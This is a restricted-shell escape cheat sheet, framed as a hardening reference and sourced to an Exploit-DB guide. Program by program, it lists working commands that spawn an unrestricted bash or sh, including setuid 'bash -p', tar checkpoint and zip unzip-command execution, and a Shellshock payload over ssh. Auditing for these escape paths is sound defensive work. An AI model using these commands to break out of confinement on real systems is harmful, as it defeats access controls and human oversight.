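Additional Resources: GTFOBins
Each heading below names a program that can start an unrestricted shell from inside a restricted shell. When hardening a restricted account, treat any of these programs in its allowed command set as an escape path.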
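Spawning
(`-p` stops bash from resetting its effective UID to the real UID, so it only changes anything when the shell binary is setuid; setuid bits on shell binaries are what to audit for.)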
/bin/bash -p
/bin/sh
Copy
cp /bin/bash .
/bin/bash -p
cp /bin/sh .
/bin/sh
python
python -c 'import os; os.system("/bin/bash")'
python -c 'import os; os.system("/bin/sh")'
php
php -a
exec("bash -i");
exec("sh -i");
perl
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'
ftp
ftp
!/bin/bash
!/bin/sh
gdb
gdb
!/bin/bash
!/bin/sh
man
man
!/bin/bash
!/bin/sh
more
more
!/bin/bash
!/bin/sh
less
less
!/bin/bash
!/bin/sh
vim
vi
!/bin/bash
!/bin/sh
vim
!/bin/bash
!/bin/sh
git
git help status
!/bin/bash
!/bin/sh
rvim
rvim
python import os; os.system("/bin/bash")
python import os; os.system("/bin/sh")
awk
awk 'BEGIN {system("/bin/bash")}'
awk 'BEGIN {system("/bin/sh")}'
find
find / -name test -exec /bin/bash \;
find / -name test -exec /bin/sh \;
nano
nano -s "/bin/bash"
- Type out “/bin/bash”
- Run Spell Check (^t)
pico
pico -s "/bin/bash"
- Type out “/bin/bash”
- Run Spell Check (^t)
zip
zip <zip>.zip <aFile> -T --unzip-command="sh -c /bin/bash"
tar
tar cf /dev/null <aFile> --checkpoint=1 --checkpoint-action=exec=/bin/bash
SSH
ssh <username>@<ip> -t "/bin/bash"
ssh <username>@<ip> -t "/bin/sh"
ssh <username>@<ip> -t "bash --noprofile"
ssh <username>@<ip> -t "() { :;}; /bin/bash"
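# ShellShock: refers to the `() { :;}; /bin/bash` command above; it only has an effect where the server's Bash is still unpatched for Shellshock
ssh -o ProxyCommand="sh -c /tmp/<file>.sh"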
Source: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf